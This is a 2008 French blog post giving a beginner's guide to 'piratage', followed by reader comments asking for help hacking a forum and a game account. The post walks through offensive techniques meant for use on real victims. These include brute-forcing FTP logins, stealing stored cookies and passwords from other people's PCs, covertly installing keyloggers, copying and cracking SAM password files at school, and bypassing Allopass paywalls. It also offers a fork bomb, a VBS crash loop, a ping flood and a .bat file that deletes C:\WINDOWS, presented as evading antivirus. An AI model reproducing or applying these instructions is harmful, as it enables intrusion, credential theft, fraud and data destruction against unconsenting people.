17/09/2008

le piratage - The Hacker

 


dyn008_original_380_471_pjpeg_2573157_1aefe4c3cc7f54f3ef7cf7d5ea8fb86bTout d'abord rappeler vous que Ni moi ni mon hebergeur ne pourront être tenu responsable de vos actes et de l'utilisation de fichiers ou programmes illicites. Si vous n'acceptez pas la responsabilité, veuillez quitter sinon c'est que vous êtes d'accord

 

Tout d'abord qui sait ce qu'est vraiment un hackeur, crackeur, phreackeur,...

Un Hacker est une personne qui est à la pointe de la technologie, en quête de connaissance et de défi à lui même; il n'a rien a prouver a personne.

 Il sait ce dont il est capable. Très à l'aise sous lartisten'importe quel système, il pourrait vous décrire l'architecture de n'importe quelle machine. Un hacker ne se dévoile jamais, si vous souhaitez en rencontrer un, cela est impossible. Un Hacker au sens propre du mot ne veut pas dire grand chose, on confond le crascheur avec le vrai hacker.

Beaucoup de monde induise les gens en erreur sur  le sens du mot hacker; de nos jours, il devient dur de le définir, on pourrait dire qu'un hacker est un informaticien de haut niveau qui souhaite progresser dans ces connaissances sans causer tord à quiconque.

Si vous vous prenez pour un Hacker, croyez moi, vous ne l'êtes pas, toutes les personnes qui se disent hackers, ne le sont pas. (simple mode, dans 6 mois, ils seront reconvertis).

 Un crasheur est une personne qui cherche tout comme le hackeur va s'infiltré dans des machines, des sections privées... et détruire tout sur leur passage. C'est la grande différence. Le but est de détruire et cela est souvent mal vu, et on confond alors hackeur et crasheur.  Ce qui est dommage.

 Un cracker est une personne qui cherche à décrypter les codes des logiciels quels qu'ils soient, ils y a ceux aussi qui désassemblent un programme à l'aide d'un débuggeur et qui tracent le programme afin de trouver un mot de passe ou bien trafiquer le programme pour ne plus avoir affaire aux limitations de temps et autres... Pour crackers, les logiciels les plus utilisés sont Windasm, Winice, Craclerjack et Softice.

Un phreackeur est une personne qui en fait tous pour ne pas payer ses factures de téléphone et qui bricolent leurs lignes téléphoniques, bidouillent des fausses cartes téléphoniques, des programmes pour téléphoner gratuitement ... Mais c'est illégal et souvent dangereux. Les moyens pour faire du phreacking sont appelé BOX avec des variations. 

Un lamer est un petit con (il faut le dire) qui fait le malin mais qui utilise les connaissances des autres. Leurs principales occupations sont de faire chier le monde. Il flood (répéter un grand nombre de fois le même message) ou encore il utilise des script tout préparé et des nuckers. Ils utilisent aussi beaucoup les troyens. Autant dire que c'est gens là sont tous sauf des grand malins.

Un newbie est une personne qui apprend le hacking ou le cracking. Ils faut les respecter car n'oublier pas que vous même grand hackeur vous avez été newbie. Alors si quelqu'un essaie de hacker un newbie que Dieu est pitié de lui car si il OSE faire cela ils n'est pas digne de porter le nom de hackeur mais de lamer (ce qui est tout dire).

Le carding est une fraude de cartes bleues. C'est une méthode qui consiste à trouver un numéro de CB valide, ainsi que sa date d'expiration. Cela se fait grâce à un algorithme. Des logiciels permettent de faire ce calcul rapidement. Nous n'en parlerons pas sur ce site mais vous trouvez beaucoup de bon site sur cette matière sur google.

Maintenant assez de bla bla passons à ce qui vous intéresse

Voici les peines encourues

Les Trojans

Une partie du hacking (surtout pour les débutant, est la pénétration dans un pc disant, pour cela il utiliseront des trojans. Ces trojans sont composée de 2 partie. Le client et le serveur. Le pirate va envoyer le serveur à la victime. Si celui-ci est exécuter (ouvert) il ouvre un port défini par le constructeur du trojan. Maintenant que le ports est ouverts, il suffit au hackeur de chopé l'ip de la victime d'ouvrir la partie client et suivant le trojan utilisé, il pourra faire plus ou moins de manipulation à distance (contrôle de la souris, écran, keylogger, visionner les disques durs,...) Mais nous ne nous attarderons pas la dessus car joué avec les trojans est possible au premier crétin venu.

Dossier sur les IP

C'est quoi une adresse IP ?

Une adresse IP est 4 chiffre séparé par un point style 127.0.0.1 Ce numéro IP est la seul façon qui existe pour ce faire identifié. Sachez quand même que suivant la connection cette ip est fixe ou dynamique, c'est t'a dire qu'elle reste la même a chaque connection ou qu'elle change a chaque connection. Vous l'aurez compris, si elle est dynamique, pour pénétré le pc, il vous faudra chaque fois récupéré l'ip.

Trouver son adresse ip

C hyper simple allez sur démarrer/exécuter puis taper "winipcfg" (quand vous n'êtes pas connecté l'adresse IP est 127.0.0.1) Pour XP c'est "ipconfig" qu'il faut taper. 

Comment récupérez une IP sur msn?

C'est tout simple, vous devez envoie a la victime un fichier (de préférence assez gros: un mp3 par exemple pour vous laisser le temps de faire la manip suivante)

Ouvrir le dos (démarrer executer>cmd)

Tapez  netstat et vous verrez apparaître l'ip de la victime. Attention vous verrez p-e plusieurs ip s'afficher, veillez à ne pas entre connecter a un ftp (kazaa ou autre pour évitez de vous trompez d' ip)

Trouver l'ip d'un serveur

Trop simple faites un ping sur le nom du serveur.
Allez sous MSDOS et taper (si le serveur est www.pape.com)

c:windowsping -a www.pape.com

Envoi de requête "ping" sur www.pape.com [127.0.0.1] avec 32 octets de données :
Réponse de 127.0.0.1 : octets=32 temps=229 ms TTL=241
Réponse de 127.0.0.1 : octets=32 temps=227 ms TTL=241
Réponse de 127.0.0.1 : octets=32 temps=220 ms TTL=241
Réponse de 127.0.0.1 : octets=32 temps=221 ms TTL=241
Statistique Ping pour 127.0.0.1:
paquets : envoyés = 4, reçus = 4, perdus = 0 (perte 0%)
Durée approximative des boucles en milli-secondes :
minimum = 220ms, maximum = 229, moyenne = 224ms

En jaune, l'ip du serveur

Jouons avec les Ip

Le pirate afin d'éviter de se faire reconnaître tentera un maximum de cacher son ip. Pour cela il utilisera des proxys soit il utilisera un compte qu'il à pirater. Mais certaine application lui serait utile pour que l'information passe directement chez lui sans passer par le proxy (programme...) Si par exemple il doit faire cliquer la victime sur un lien où il y a son ip, la masquer serait très intéressant.

La technique que je vous propose n'est qu'un simple calcul.
Exemple : prenons une IP au hasard 152 . 227 . 45 . 136

Multiplier le premier chiffre par 256 ³ ( 256*256*256 ) ; soit 152 * 16777216 = 2550136832
Le second chiffre par 256 ² ( 256*256 = 65536 ) - soit 227 * 65536 = 14876672
Le troisième par 256 ( euh...) - soit 45 * 256 = 11520
Le quatrième reste identique ( * 1 quoi ! ) - soit 136
----------------------------------------------
Additionner les quatre résultats et votre IP est cryptée: 2565025160
Il ne vous reste plus qu'à remplacer vos url par ceci : 2565025160, un url que vous pouvez trafiquer avec des informations de votre choix comme ceci :

http://BaD--bOy@2565025160
. Les informations avant le @ ne sont pas prise en compte par les navigateurs, mais s'affichent.

 

Brutus

Pour hacker un site, il y a plusieurs manières. S'attaquer directement au ftp, attaquer le webmasteur, ou s'attaquer au site en lui même (php, asp, script cgi...). Nous allons voir ici comment s'attaquer a un site par son ftp. On va tenter de trouver le mot de pass qui nous permettra de nous connecter au ftp du site (les répertoire où on envoie,edit, et supprime  les pages. Brutus est un programme qui va tenter tout les pass possible pour se connecter au ftp. Je tien a préciser que les gros hébergeur comme multimania et free permette un maximum de 20 connections échouées puis bloque temporairement le ftp. Donc il vous faut attaquer un hébergeur personnel ou un hébergeur un peu pourris. Certain brutus ont leur propre liste de code possible appelé dictionnaire. Si ce n'est pas le cas il vous faudra en créer un vous même.

Ces programmes fonctionnent avec des listes de pass possibles et le teste un a un, a vous de trouver les bonnes combinaisons ou créer vous même votre dico.

VBasic

Virus par ci, virus par là, vous croyez que en surfant sur le net sans rien télécharger, vous êtes à l'abris des virus. Et bien détrompez-vous, la visite d'une page piégée peut devenir mortelle. Avec un simple code à mettre entre la balise <BODY> Et </BODY> d'une page HTML, vous pouvez faire exécuter a l'ordinateur des tas d'action +- destructrice (effacer la base de registre, désinstaller de le disque dur, renommer l'ordinateur...). Si le webmasteur qui a mis ces codes sur sa page vous envoi dessus, normalement si votre configuration de sécurité d'internet explorer est réglée sur normal, celui-ci vous demandera si vous souhaité activer l'active X. Si vous cliquer sur "OK", c'est du tout cuit. Sinon, bein il ne se passera rien. Attention, les firewall (pare-feux) peuvent aussi empêcher les changement dans la base de registre

 

 

Récupération de documents intéressants

Le pirate étant connecté au pc a distance (par n'importe quel moyen (trojan, nbtstat...) va essayer de choper des renseignements qui pourrais encore être plus intéressants que la connection au pc ou de même pour  le pirate qui est  sur un pc avec sessions (voir même pc de cyber-café). On réfléchi deux secondes et puis on cherche où on peut trouver des docs intéressant... Des fichiers personnels donc... Dans le rep "Mes Documents" de Windows bien sûr, ainsi que dans les rep avec des noms tels que "perso", "sylvain" (si le mec s'appelle sylvain)... Récupérez tout ce qui vous semble intéressant, ce qu'on cherche c'est des infos concernant l'utilisateur, et plus précisément des trucs tel que numéro bancaires... Bon avec ça on obtient des trucs pas mal. Quand vous surfez sur certains sites, ces dernier mettent des cookies sur votre disque dur afin de vous identifier, de connaître vos goûts, vos habitudes. Un bon exemple est le site de microsoft qui se modifie en fonction de l'attitude du visiteur (un truc de vrais pros quoi). Enfin bon ce que j'ai découvert c'est que certains sites ne sécurisent pas leurs cookies. Je m'explique : quand vous allez sur certains sites où vous êtes enregistré, vous entrez votre login, votre mot de passe et boum vous êtes loggé, si vous y retournez plus tard, plus besoin de se reloggé parce que le site vous a identifié grâce au cookie de la dernière visite et dans lequel il y a le login et le password !!! Bien entendu beaucoup de sites cryptent leur cookies (n'espérez pas trouver des password caramail) mais certains ne le font pas. En effet je suis allé voir dans mes cookies et là j'ai vu en clair, sur une ligne, le nom d'un site sur lequel je vais, suivi de mon login et de mon password. Le pire c'est que c'est un site qui me permet de gagner du fric (quand on met une pub sur un site perso).

Plus tard j'ai fais pareil mais sur l'ordinateur de mon père, juste par curiosité évidemment, et là qu'est ce que je vois : l'adresse d'un site de bourse en ligne suivie de près par le login et plus loin le password. Bref là encore un site où on gagne du fric. Il m'aurait suffit de me connecter sur ce site avec le bon nom et le bon mot de passe, d' aller dans la section "mes infos" ou "mon profil" et de récupérer les infos intéressantes telles que le vrai nom de l'utilisateur, son adresse, son numéro de carte bleue avec la date de validité et hop !! 

Sous Windows et avec Internet Explorer, les cookies se trouvent dans /windows/cookies/, ils sont en plusieurs fichiers. Sous Linux, avec Netscape, ils sont dans un seul fichier, dans /.netscape/, le fichier s'appelle cookies. Il parait même qu'il existe des logiciels qui permettent de se connecter avec les cookies, dans ce cas, même les cookies cryptés peuvent être utilisés, c'est fort non ? Fouillez les disques dur de votre bahut, de la salle de jeux en réseau du coin...

Keylogger ses victimes

Pour récupérer des infos, le pirate peut aussi installer un keylogger qui va enregistrer tout ce qui est tapé (y compris les mots de pass). Soit les fichiers sous forme.txt sont envoyer par mail ou sur un ftp soit stocker sur le disque dur et le pirate s'arrangera pour venir les chercher.

Un keylogger est un programme permettant d'enregistrer vos frappes de clavier.
Il est surtout utilisé pour l'espionnage de vôtre petite copine ;) ou pour retrouver un mot de passe... perdu lol
Le plus généralement, un keylogger crée un fichier .txt sur votre disque dur en l'éditant de vos frappes de clavier.
Il existe aussi d'autre génération de keylogger qui envoie ce fichier directement à l'email du vilain Hacker.
Si vous avez accès à l'ordinateur, notamment si vous avez des doutes sérieux sur votre copine qui ferait un cyber-sex avec un boutonneux, vous pouvez télécharger Ghost Keylogger
http://www.bysoft.se/sureshot/gkl/gkldemo.exe 
Ou vous rendre directement sur le site officiel.
http://www.keylogger.net 
La plupart des bons trojans  ont un keylogger incrusté dans leurs fonctions, notamment NetBus ou encore SubSeven il vous suffit de cliquer sur un bouton.
Pour un vrai keylogger, on peut citer logger qui est indétectable à la fonction : Ctrl + Alt + Suppr
Vous pouvez vous en procurer quelques uns à cette adresse
http://www.astalavista.com/tools/utilities/keylogger
Sinon en voici quelqu'un : iks2k21d ou family-key-logguer

Pirater une école

Là, ça commence à se compliquer. C'est même un vrai challenge. Mais c'est faisable. Avant tout, je tiens à vous dire que je n'ai jamais été confronté à pirater Windows NT ou 2000. Je viens de vous apprendre a cracker les pwl ce qui devrait vous faciliter la tâche. Tout d'abord, les deux versions de Windows stockent leurs mots de passe dans un fichier beaucoup mieux crypté que les pwl, ce sont les fichiers SAM. Ils sont plus sécurisés mais ont quand même un défaut. Comme les PC basés sous Windows NT/2000 sont faits pour être compatibles avec les versions 9x de Windows, ils utilisent aussi un cryptage plus faible appelé LanMan. Ce cryptage est légèrement meilleur que pwl. En fait ce que je suis en train de vous dire est qu'il faut trouver le fichier SAM pour pirater les mots de passe. Contrairement à Windows 9x, Windows NT ou 2000 stockent tous leurs mots de passe dans un seul fichier SAM. Mais il y a quand même un désavantage à tout ça. C'est très difficile d'obtenir une copie de ces fichiers. Les véritables fichiers SAM se trouvent dans le répertoire C:/winnt/system32/config sous le nom SAM. Mais comme par hasard, tant que Windows est lancé, il bloque l'accès à ces fichiers. Mais on peut les récupérer en 2min30 à peu près, il suffit de télécharger ReadNtfs (télécharger.com) et avec ça, on peut lire les partitions NTFS sous dos, donc le SAM a pas encore disparu (quand on est sous dos), en plus, c'est assez simple à utiliser... Il reste ensuite plus qu'à copier le SAM sur une disquette et c'est bon. Mais par contre il y a un outil que les administrateurs utilisent pour la sauvegarde des fichiers importants dans un répertoire qui n'est pas protégé, et les fichiers SAM en font partie. Ce répertoire c'est C:/winnt/repair/ et il devrait y avoir des fichiers SAM._ . Ce sont des compressions de vrais fichiers SAM. A partir de là, arrangez-vous pour les obtenir sur une disquette ou chez vous, afin de pouvoir les décrypter.            
Admettons maintenant que vous avez obtenu une copie de ces fichiers et que vous êtes chez vous en train de relire ce tutoriel… La première chose à faire est d'aller sur le net et de trouver une version du logiciel
l0phtcrack + crack ici (la première lettre est un L et la seconde un zéro). C'est un logiciel qui permet de récupérer et de décrypter plein de types de mots de passe, dont les PWL et les SAM. Sauvegardez donc la copie de votre fichier SAM sur votre disque dur, puis lancez le logiciel et faites File>Import SAM et ouvrez votre fichier. Maintenant lancez le décryptage. Vous devriez faire ça avant d'aller vous coucher et laisser tourner l'ordinateur la nuit car cela risque d'être très long. Là où cracker des fichiers PWL prenait une heure, un fichier SAM peut prendre jusqu'à 24 h avec un pentium 3. Donc patience, beaucoup de patience.
Le mot de la fin. Il y a plusieurs autres façons de pirater un PC administré, mais cette méthode convient bien à l'école car vous êtes limité en temps et sûrement surveillé par un prof. Ces méthodes sont font en 5minutes, ce qui est bien pratique.

Suppression du .pwl (win95-98)

Vous avez oubliez votre mot de passe Windows ? (ou plutôt vous n'avez pas l'accès a windows)
Démarrez votre ordinateur et quand vous voyez "démarrage de Windows", appuyez sur la touche "F8".
Choisissez de démarrer en mode MS-DOS
Puis, au prompt, tapez "del c:Windows*.pwl". redémarrez votre PC, puis mettez un nouveau login, et un nouveau mot de passe.

Contourner un allo pass

Le pirate ne se laissera pas faire lors qu'il veut obtenir une info, un programme mais qu'il doit le payer. Il tentera de le chopé les choper sans avoir à payer. 

Une faille causée par Front Page
Lorsqu'un webmasteur crée son site a partir du logiciel Front Page, un sous répertoire est ainsi crée automatiquement et est configure en fichier cacher. Il se nomme normalement _vti_cnf. Il reproduit alors toutes les pages crées sous Front Page.
Un problème peut alors subvenir lorsque le webmasteur ne fais pas attention. En général lorsque le webmasteur veut mettre son site en ligne pour la première fois, il sélectionne tous ces répertoires, et sans le savoir il sélectionne aussi ce fichier et déposent tout sur son serveur hébergeur.
Le répertoire _vti_cnf est alors crée.
Vous pourrez donc accédez au sous répertoire et avoir ainsi l'accès a toute les pages.
Cette faille peut entre encore aggravée si le répertoire _vti_cnf contient les mots de passes (mdp) des users du site. Vous aurez donc accès a toutes les copies des pages même celle protégée par allopass.

Contourner TOUT les allo pass possible pour autant que le site ne soit pas en php,asp... et que le webmasteur n'aille pas séparé les comptes des pages et des données à protéger

Outil nécessaire : intellitamper    
Méthode :
Télécharger le logiciel intellitamper et installez le . C 'est un progs génial qui scanne tous les lien du site.
Une fois installer entrer simplement l'adresse du site , non pas celle donner par le webmasteur mais celle que vous obtenez en faisant un clic droit. Attention certains site sont plus malin que d'autre et ils vous interdise le clic droit. Ce n'est pas grave copier l'original et intellitamper se chargera de la trouver pour vous.
Remarque : Pour les sites redirigé par ulimit, faites "affichage">"source"  et vous verrez la véritable adresse . Voila vous savez se qui vous reste a faire. Si vous ne savez pas reflechisser 2second et vous trouverez facilement. 
End : trouver les pages protéger par les allo pass. Soit click droit "open file" Et la page s'ouvrira. Attention, si le webmasteur a mis la protection de allo pass qui fonctionne avec cookie (50/100 de chance qu'il ai oublier), la page ne s'affichera que qq seconde. Sinon mettre view source et la vous obtiendrez les codes en html ou encore, cliquer sur save file as... et ouvrer le avec un éditeur hmtl ou bloc note et supprimer les lignes suivantes qui doivent se trouver entre <head> et </head>:    

<noscript>
<meta http-equiv="Refresh" content="0;URL=http://www.allopass.com/check /error_code.php4?DOC_ID=62395&SITE_ID=22690">
</noscript>
<script language="Javascript" src="http://www.allopass.com/check/chk.php4? IDD=62395&IDS=22690"></script> 

Les chiffres et lettres peuvent varier. Voila j'espère que maintenant qu'aucune protection allo pass ne vous résistera.
PS: Cette techniques ne fonctionne que si le lien vers la page protégée est sur le même compte. Sinon se sera raté. Il faut connaître ou du moins trouver le nom protégée.

 

Installer Windows 98 Sans Sérial 

Voila je vais vous expliquez la plus stupide astuce qui me vient a l'esprit pour pouvoir installer une version de Windows 98 (Se) sans mettre de Sérial... Installer Windows 98 jusqu'a ce qu'il ait tout copié, rebooté, puis que une MSgBox vous demande le Sérial... Et bien voila tiens, je vous ai bien eu, au lieu de laisser la machine rebooter sous windows, vous lui demander de faire un pas à pas, et vous mettez oui partout sauf à Charger les drivers de windows ou un truc comme ça ... Normalement, si je ne me trompe pas, vous êtes rentré dans windows en mode sans échec. Lancez Regedit, et allez sur HKeyLocalMachine/Software/Microsoft/Windows/Current Version et la vous verrez des trucs cool ... pour vous aiguillez, vous mettez un faux nom et un faux Sérial puis REgdone=1 ou lieu de rien... Pouf vous rebootez et bardaf, ça a marché ... 

Bugger le pc (Windows)

Les 2-3 articles qui vont suivre ne peuvent pas s'appellera du piratage proprement dit. Par contre trouver des failles qui vont faire planter (si possible a distance) un pc, là ça devient un challenge. Par contre imaginez que vous fassiez exécuter a l'ordinateur de la victime a chaque démarrage de celui ci le "buggeur".

Utile qd vous étés sur le pc a l'école ou même encore sur le pc de qq.  Dans le genre truc inutile à savoir mais amusant: Dans Démarrer/Exécuter, taper c:concon Et là, on a droit a un joli écran bleu ou un arrêt de l'ordi, seul la souris marche selon la version de win avec un joli message. Ca ne marche que sur win98. Un conseil: Ma tactique c'est de faire un lien sur une page avec comme lien comme ici par exemple:  ICI Si vous êtes assez con pour cliquer ici, vous allez tout simplement planter et vous devrez redémarrer, rien de plus. (de toute façon win 98 n'a pas besoin de ce code pour planter, il s'en charge tout seul lol :p)

Bugguer le pc (Linux)

Tous d'abord, lancer un terminale ( une sorte d'invite de commande DOS sous linux), puis tapez la commande suivante : :(){ :|:&};: , faites Entrée et normalement,le PC devrait être bien planté, voir inutilisable, bien entendu, un simple reboot suffit a annulé les méfait de l'action précédente :) Si sa ne marche pas vérifier de bien avoir mis un espace après le { .

Comment planter un Pc avec juste 4 ligne de code

On s'es toujours demandé si on pouvait planter un pc ultra rapidement et simplement.
Avec le vbs c très simple.
-ouvrez votre bloc-notes
tapez le code suivant:

Set variable = CreateObject("WScript.Shell")
Do
variable.run "notepad",false
Loop

Évidemment vous pouvez mettre winamp ou ce que vous voulez à la place du notepad...
Enregistrez en.vbs Voilà!!! L'exécution du programme sera peut-être bloquée par norton mais ne l'arrête pas toujours.
,false indique que vous ne voyez pas les dizaines de fenêtre de notepad s'ouvrir.
Vous pouvez essayer le prog sur votre pc bien sur mais soyez rapide au control-alt-sup. vous vous rendrez alors compte du nombre de notepad lancés..

Votre propre Nuckeur-DOS

Le nucking est l'art de faire planter un pc a distance souvent en utilisant les requêtes ping. Il suffit d'avoir l'ip. Le pirate utilise un technique par le Ms Dos qui plante un serveur a distance, par TCP/IP .

Explication:
Un ping sert simplement pour voir le temps qu'une machine répond sur le réseaux... 
Mais un mass ping peut planter un serveur.
Pour cela il va dans:
"Démarrer/Exécuter/ping ipdugars" 
Le Hacker noteras au passage L'Ip du serveur.
La Hacker n'a simplement fais qu'un ping ..... Maintenant il vas commencer son attaque:
"Démarrer/Exécuter/ping -t Ip _du_gars" (on peux aussi mettre l'ip d'un gars)
Vous remarquez que le Hacker à rajouté -t cela vas faire un véritable Flood de ping qui iras aussi vite que possible. 
Après envoyé cette commande, le Hacker reboote sa machine pour aller encore plus vite ( CTRL+ C arrêtera le Flood )
Je tient a préciser que si vous essayez, vous serez très vite repéré ( Votre IP se trouve dans tous les Pings que vous envoyez)

 

1er partie: Théorie

Les virus sont devenus une menace permanente. Une infection est actuellement 20 fois plus probable qu’il y a 2 ans. On estime qu’une entreprise infectée a besoin de 5 jours ouvrables pour se débarrasser totalement de l’assaillant. Donc la lutte antivirus revêt une importance majeure.

1 : Qu’est-ce qu’un virus ?


Un virus est un programme autoreproducteur capable de se propager de façon autonome. Il causera des dégâts dans le système qu’il a infecté. Ces dégâts soit d’ordre logiciel soit même matériel, certains n'hésitent pas à détruire votre BIOS, et vont de l’affichage d’un petit message au formatage complet de votre disque dur. Voici les sources d’infections :

·     Une disquette dont le secteur d’amorce est infecté.

·     Une disquette qui comporte un fichier exécutable infecté.

·     Un LAN (Local Area Network ou réseau local) qui contient un poste infecté.

·     Internet, par simple téléchargement.

·     Le courrier électronique, par un document joint infecté.

2 : Types de virus

On classe les virus de 5 façons : 

a) Virus du secteur d’amorce ; ils remplacent l’amorce d’un disque par leur propre code et se chargent ensuite en mémoire centrale. Il rendent inutilisable le disque d’amorçage et/ou se propagent vers d’autres disques. 
b) Virus de fichiers ; ils ajoutent leur code aux fichiers exécutables (*.exe *.com *.bat ) et se chargent en mémoire centrale afin de contaminer encore d’autre programmes. Il rendent ces programmes inutilisables. 
c) Virus furtifs ; ils échappent à toute détection en se camouflant. Une des méthodes de détection consiste à enregistrer la longueur d’un programme (si le virus a ajouté son code, on peut facilement comparer avec une simple sauvegarde de ce progr. ) 
d) Virus polymorphes ; ils modifient leur aspect à chaque nouvelle infection. 
e) Virus cryptés ; ils modifient leur code, ce qui complique leur détection. 

On peut ajouter 2 cas, mais souvent moins fréquents à cause de leur puissance : 
f) Cheval de Troie ; bombe à retardement implantée dans un programme. Il peut se déclencher à tout moment ou attendre un signal externe. Ce n’est donc pas un virus puisqu’il n’est pas conçu pour se reproduire et se propager. 
g) Bombe logique ; variante du cheval de Troie, elle attend un signal externe pour exploser. Ce signal peut être une date précise, un lancement d’un certain programme etc.. Les dégâts causés par cette bombe peuvent être d’ordre matériel des fois, comme une modification du BIOS pour entraîner une surcharge électrique 

Fichier texte décrivant certain virus

3 : Symptômes d’une attaque

Voici les principaux symptômes : 
*Un chargement d’un programme plus long que d’habitude. 
*Un réseau anormalement chargé. 
*Mémoire centrale insuffisante. 
*Espace disque réduit. 
*Taille de fichiers qui s’accroît anormalement. 
*Système et/ou programmes qui plantent. 
*Messages d’erreurs ou messages curieux. 
*Un jeu de ping-pong apparaît. 
*Les caractères s’écroulent. 
*Mélodies bizarres au format midi. 
*Accès disque multipliés. 
*Perte de fichiers et de données. 
*Programmes refusant de s’exécuter ou s’exécutent mais de façon anormale. 
*Autoformatage du disque dur. 

4 : Fichiers cibles des virus

Le premier objectif est la contamination de une ou plusieurs cibles qui lui permettront d’être relancé le plus souvent possible. Une cible est appelée vecteur de contamination.
En principe, il existe 3 phases d’existence : 

Infection ; le virus infecte le système cible. 
Contamination ; il se duplique et infecte d’autres cibles sans perturber le fonctionnement du système. 
Destruction ; il entre en activité et produit les effets pour lesquels il a été programmé. 

Cibles des virus : 

-Fichiers exécutables, surtout les .COM (avec le très célèbre COMMAND.COM qui est lancé à chaque démarrage du système ). 
-Fichiers systèmes, particulièrement les IO.SYS et MSDOS.SYS (qui sont lancés au démarrage du système aussi) . 
-Les fichiers temporaires de recouvrement .OVL . 
-Fichiers binaires .BIN. 
-Fichiers pilotes .DRV. 
-Le secteur de la table de partition du disque dur (lu par le BIOS à chaque initialisation) ou d’une disquette BOOT. 

5 : Programmes antivirus

Même si les programmes antivirus sont nombreux, rares sont ceux qui sont à jour et efficaces même parmi les plus grands noms. Cependant, il y a une exception à la règle, en effet Panda Software est la seule qui a bien voulu tenir compte de mes mails et qui a développé des protections contre les programmes d'intrusion disque dur. 

C'est à ma connaissance LE seul antivirus qui détecte autant de chevaux de troie. Il existe bien l'un ou l'autre programme spécifique qui détecte et éradique l'une ou l'autre de ces saloperies mais aucune solution complète et fiable n'avait encore vu le jour. Dès à présent je peux vous dire que ce n'est plus le cas et je peux vous affirmer que Panda Antivirus est pour moi la seule solution contre les chevaux de troie et autre virus pour le moment. 

C'est très simple, suite à mes déboires avec Norton et Mc Afee qui n'on pas vu qu'un virus avait infecte plus de 400 programmes exécutables sur mon disque dur, je ne fais plus confiance qu'à Panda. Et oui; un jour à ma grande surprise, j'ai aussi été infecté malgré toutes les précautions que je prend et le temps que je m'en rende compte c'était 400 programmes qui étaient touchés....

C'est le seul antivirus qui bénéficie de mises à jour sérieuses et qui est capable en 24H de trouver la solution à un problème. Vous pouvez en effet charger si vous êtes un utilisateur enregistré la mise a jour journalière de cet antivirus sur Internet. Mais oui vous avez bien vu, tous les jours chez Panda on découvre de nouveaux virus, alors allez voire leur concurrents et si vous avez de la chance le fichiers de virus aura 15 jours voire un mois....

En bref si vous avez besoin d'un antivirus de toute urgence ou si vous avez un doute sur un fichier que vous avez reçu, allez dl la version d'essai de Panda Antivirus, ensuite rendez-vous chez votre revendeur préféré et achetez la licence. Cette licence vous permettra d'aller chercher les mises à jour de l'antivirus afin pour une fois de devancer l'ennemi et non plus de le subir. De plus en achetant la licence, vous aurez droit à un support technique 24H/24 365 jours par an et Panda s'engage a trouver une réponse à votre problème dans les 24H si c'est un virus ou similaire. J'ai testé, j'ai envoyé un soir deux fichiers avec virus et le lendemain, j'avais l'antivirus qui correspondais. 

Panda antivirus est disponible à la Fnac et chez tous les bons revendeurs. Pour downloader la version d'évaluation de Panda, je vous invite à vous rendre sur leur site :
www.pandasoftware.com  ou a cliquer sur le petit Panda. Attention même si il a l'air gentil, il est redoutable et impitoyable, il ne faut pas se fier au apparences. Au fait j'ai oublié de vous dire, je n'ai pas d'actions chez Panda Software. Je vous conseil aussi de faire un scan disk contre les virus et les trojan gratuitement et sans installer quoi que se soit. Cliquer sur le logo (je vous conseil néamoin de désactiver la sécurité internet et les firewal qui pourrait gêné le bon déroulement de l'application.

Outre la très bonne fiabilité de cet antivirus, je vous signale qu'il va bientôt sortir une version 6.0 et 6.0 Deluxe vers octobre 2002. Il est a noter que tous les clients de chez Panda disposeront d'une mise Mise à Jour gratuite vers cette version, ne l'attendez donc pas, vous pouvez achetez dès maintenant et demander quand elle sortira la mise à jour vers la 6.0. Cette version est absolument révolutionnaire, non seulement conçue pour Windows XP, elle va pouvoir scanner votre boite à mail à l'intérieur même du serveur. De même puisque Internet se développe de plus en plus, Panda à mis au point un antivirus qui est capable de scanner toutes vos transmissions qui viennent d'Internet dans les protocoles les plus souvent utilisés et pouvoir réagir avant même que vous n'ayez la possibilité d'utiliser vos données en cas de problème ou de virus. Cela signifie que n'importe quel programme qui utilise un des protocole surveillé(HTTP, HTML, FTP, NNTP (pour les newsgroup), SMTP, POP3 et IMAP4(futur standard des serveur de courrier électronique)) sera automatiquement protégé.

Voila si en désespoir de cause, et si Panda ne répondait pas à vos attentes, il reste encore les antivirus classiques, si vous avez trop de temps, vous pouvez toujours aller les chercher mais n'en espérez pas autant que Panda.... 

2eme partie: Pratique

Créer vos virus vous même

 Bases de la programmation de .bat:
La création de fichiers .bat est simple: il suffit de s'y connaître un peu en
MS-DOS, et savoir taper sur son clavier. D'abord quelques commandes de bases:
echo off : désactive l'affichage de ce qui se passe
dir C:WINDOWS : affiche le contenu de C:WINDOWS
del C:WINDOWS*.exe : efface tous les fichiers .exe du C:WINDOWS
move fichier : déplace le fichier "fichier". 
echo : saute une ligne
echo J'écris bien hein? : affiche ce qui est écrit après [echo]
cls : efface l'écran
pause : demande d'appuyez sur une touche pour continuer
C:WINDOWStelnet.exe : exécute telnet
C:WINDOWS ON_PROG.EXE : exécute ton_prog.exe
attrib : Affiche ou modifie les attributs d'un fichier
copy : Copie un ou plusieurs fichiers.
date : Affiche ou modifie la date.
labbel : Crée, modifié ou supprime le nom de volume d'un disque
format : Formate un disque pour utilisation avec Windows
md : Crée un répertoire
print : Imprime un fichier texte

Donc voici le genre de fichiers .bat extrêmement dangereux que vous pouvez faire:
echo off
echo this programm is created by XXX all rights reserved
pause
del C:WINDOWS*.*
dir C:WINDOWS
echo t'es mort
cls

Vous tapez tout ça dans bloc note et vous l'enregistrer en .bat. Ce qui est bien avec ça c'est que les antivirus ne le détecte pas du moin pas certain.

 

affiche
007

 

 

 

 

 

 

04:26 Écrit par Date/Heure dans Web | Lien permanent | Commentaires (16) |  Facebook |

Commentaires

aaaaaa il é a chié ton blog

Écrit par : slim | 24/09/2008

c'est interessant au fait je cherche a hacker un forum , ou meme le crasher , tu ne sais pas qui pourrais m'aider ?

merci d'avance

Écrit par : not | 29/12/2008

Très intéressant Superbe blog, surtout la parti piratage, cependant certain des conseils que tu mets on déjà trouvé des parades. Je pense par exemple à Intellitamper pour contourner les allopass. D'ailleur si tu trouves le moyen de les contourner à nouveau je suis prenneur. A moins que l'on puisse encore le faire avec Intellitamper, mais que je sois trop une brel pour y arriver... ce qui est fort probable, mais maintenant les pages de validation du pass ne contiennent plus l'adresse du fichier à télécharger. Help cher ami, si tu vois le problème.
Pas mal aussi toute la parti sur l'Algérie, j'ai beaucoup aimé la photo du chantier, car j'ai déjà bosser sur un chantier et il est vrai que les rivalités entre les différentes équipes sont parfois très tendus.

Écrit par : Antarès | 04/01/2009

vous ne saver rien on hack le hack ci un art et seule les artistes de l'informatique le connasse

Écrit par : hamzazu$ | 18/02/2009

SLT je veut savoir commant hacker un account d'une jeux online car je suis deja hacker et je veut me vanger
merci d'avence

Écrit par : cool | 03/04/2009

